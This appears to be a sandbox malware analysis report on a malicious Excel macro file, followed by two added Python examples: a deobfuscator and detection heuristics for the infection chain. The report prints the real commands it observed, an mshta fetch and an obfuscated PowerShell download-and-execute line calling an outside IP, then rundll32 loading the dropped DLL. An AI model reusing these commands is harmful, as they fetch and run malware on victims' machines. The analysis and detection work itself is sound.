                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00227C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00223E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00240E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00230001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00238606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00240C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00224816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00225E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00236C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00230E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00240056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00222051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00222251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00221A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00224C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002270B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00231889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002264E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00224EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00239EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00235CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002366CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00226D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00227735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00240F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00228B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00229714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00238519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00230B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00225361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00228969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00224346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00225548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00232550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00237BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002409B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002281B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002251BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00229B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00234B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00238BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00236DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00239BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00229DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00237DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00222BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00307C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00320E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00303C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00303E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00309011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00304816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00320C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00310001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00318606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00305E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00302051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00302251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00310E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00320056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00301A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00304C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00316C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003070B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003120BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00311889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003064E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00304EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00319EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00315CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003166CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00320F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00307735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00308B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00306D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00309714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00314116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00318519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00310B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00305361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00308969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00312550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00304346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00305548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003209B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003081B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003051BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00317BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003213AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00309B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00314B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00307FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003059F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00316DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003195FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00318BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00317DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00302BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00319BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00309DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0040044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003FF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_004020BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00404116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0040473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_004113AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00406C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00400E53
                            Source: 476C.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: CJ68000754184.xlsMacro extractor: Sheet name: REEEEEEEE
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022E249 DeleteService,
                            Source: CJ68000754184.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\CJ68000754184.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Jssipnq\
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: CJ68000754184.xlsOLE indicator, VBA macros: true
                            Source: CJ68000754184.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@21/9@2/48
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
                            Source: CJ68000754184.xlsOLE indicator, Workbook stream: true
                            Source: CJ68000754184.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,
                            Source: CJ68000754184.xlsVirustotal: Detection: 13%
                            Source: CJ68000754184.xlsReversingLabs: Detection: 18%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: (10 writes of raw console-buffer data; the only recoverable text is the UTF-16 prompt "PS C:\Users\Albus\Documents> ")
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
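The powershell.exe command line in the chain above builds its payload from string literals with a junk token removed by .replace(), joins the pieces with -Join, and hides IEX behind backticks. The Python decoder below is an added example, not part of the Joe Sandbox report, that resolves exactly those three idioms to recover the executed statement and the download URL. CMDLINE is the script argument copied from the recorded command line; the decoder assumes single-quoted literals, literal .replace() calls and a -Join of already-defined variables, and is not a general PowerShell parser.

```python
import re

# The script argument of the recorded powershell.exe command line (copied from the report).
CMDLINE = r"""$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"""

# A PowerShell single-quoted literal: no escapes except '' for a literal quote.
PS_LITERAL = r"'((?:[^']|'')*)'"
# $name='literal'.replace('needle', 'replacement')   (PowerShell is case-insensitive)
ASSIGN_REPLACE = re.compile(r"\$(\w+)=" + PS_LITERAL + r"\.replace\(" + PS_LITERAL + r",\s*" + PS_LITERAL + r"\)", re.I)
# $name=($a,$b,$c -Join 'sep')
JOIN = re.compile(r"\$(\w+)=\(((?:\$\w+,?)+)\s+-Join\s+" + PS_LITERAL + r"\)", re.I)
URL = re.compile(r"""https?://[^\s'")]+""")


def ps_unquote(raw: str) -> str:
    """Undo single-quote escaping inside a PowerShell literal ('' -> ')."""
    return raw.replace("''", "'")


def resolve_variables(cmd: str) -> dict:
    """Evaluate the literal.replace() assignments, then the -Join that concatenates them."""
    env = {}
    for name, lit, needle, repl in ASSIGN_REPLACE.findall(cmd):
        env[name] = ps_unquote(lit).replace(ps_unquote(needle), ps_unquote(repl))
    for name, parts, sep in JOIN.findall(cmd):
        names = [p.strip()[1:] for p in parts.split(",") if p.strip()]
        env[name] = ps_unquote(sep).join(env[n] for n in names)
    return env


def deobfuscate(cmd: str) -> str:
    """Return the statement that actually runs, with variables inlined and backticks removed."""
    env = resolve_variables(cmd)
    # Strip the assignment statements; what remains is the execution tail.
    tail = JOIN.sub("", ASSIGN_REPLACE.sub("", cmd))
    tail = re.sub(r";\s*", ";", tail).strip("; ")
    # A backtick before a plain letter is a no-op escape (I`E`X == IEX).
    tail = re.sub(r"`([A-Za-z])", r"\1", tail)
    for name in sorted(env, key=len, reverse=True):
        tail = tail.replace("$" + name, env[name])
    return tail


def extract_urls(text: str) -> list:
    """Pull the download locations out of the decoded statement."""
    return URL.findall(text)


if __name__ == "__main__":
    decoded = deobfuscate(CMDLINE)
    print(decoded)
    print(extract_urls(decoded))
```

The decoded tail reads IEX (New-Object Net.WebClient).DownloadString('http://91.240.118.172/gg/ff/fe.png')|IEX: the first IEX performs the download, the pipe feeds the fetched text to a second IEX that executes it, which is the stage that later writes C:\ProgramData\JooSee.dll.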
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE436.tmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
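The process chain recorded in this report (EXCEL.EXE to cmd.exe to mshta.exe to powershell.exe to cmd.exe to rundll32.exe, then rundll32.exe re-launching itself with DllRegisterServer and later with a module whose extension is not .dll) is what the Sigma-style signatures listed in the report summary fire on. The Python below is an added example, not part of the Joe Sandbox report or of any Sigma rule set; it re-implements the parent/child and command-line checks over a constructed list of process-creation events taken from that chain plus two constructed benign events. Rule names, the image lists and the benign events are assumptions made for the example.

```python
import re

# Process-creation events reconstructed from the chain in this report
# (constructed sample data: parent image, child image, child command line).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta http://91.240.118.172/gg/ff/fe.html"},
    {"parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # shortened form of the recorded command line; same idioms (.replace, -Join, I`E`X)
     "cmdline": r"""powershell.exe -noexit $c1='({FdrggvdRf}Ne{FdrggvdRf}w-Object Net.We'.replace('{FdrggvdRf}', ''); $c3='bClient).DownloadString(''http://91.240.118.172/gg/ff/fe.png'')';$JI=($c1,$c3 -Join '');I`E`X $JI|I`E`X"""},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq"},
    {"parent": r"C:\Windows\SysWOW64\rundll32.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer'},
    {"parent": r"C:\Windows\SysWOW64\rundll32.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv'},
    # Two constructed benign events: the rules should stay quiet on these.
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir"},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELL_LIKE = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
              "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
PS_MARKERS = (".replace(", "-join", "downloadstring", "frombase64string")
MODULE_EXTS = (".dll", ".cpl", ".ocx", ".ax")
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\")
URL_RE = re.compile(r"https?://", re.I)
# rundll32.exe <module, optionally quoted> <,export or space export>
RUNDLL_RE = re.compile(r'rundll32\.exe\s+"?([^",]+?)"?\s*(?:,|\s)\s*(\w+)', re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rundll32_target(cmdline: str):
    """Return (module path, export) from a rundll32 command line, or None."""
    m = RUNDLL_RE.search(cmdline)
    return (m.group(1), m.group(2)) if m else None


def evaluate(event: dict) -> list:
    """Apply the parent/child and command-line heuristics to one event; return rule names hit."""
    parent, image, cl = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    low = cl.lower()
    hits = []
    if parent in OFFICE_APPS and image in SHELL_LIKE:
        hits.append("office_spawns_shell")
    if parent == "mshta.exe" and image in SHELL_LIKE:
        hits.append("mshta_spawns_shell")
    if image == "mshta.exe" and URL_RE.search(cl):
        hits.append("mshta_remote_hta")  # HTA fetched over HTTP rather than from disk
    if image == "powershell.exe":
        norm = low.replace("`", "")  # undo backtick splitting such as I`E`X
        runs_code = "iex" in norm or "invoke-expression" in norm
        if runs_code and any(marker in norm for marker in PS_MARKERS):
            hits.append("suspicious_powershell_cmdline")
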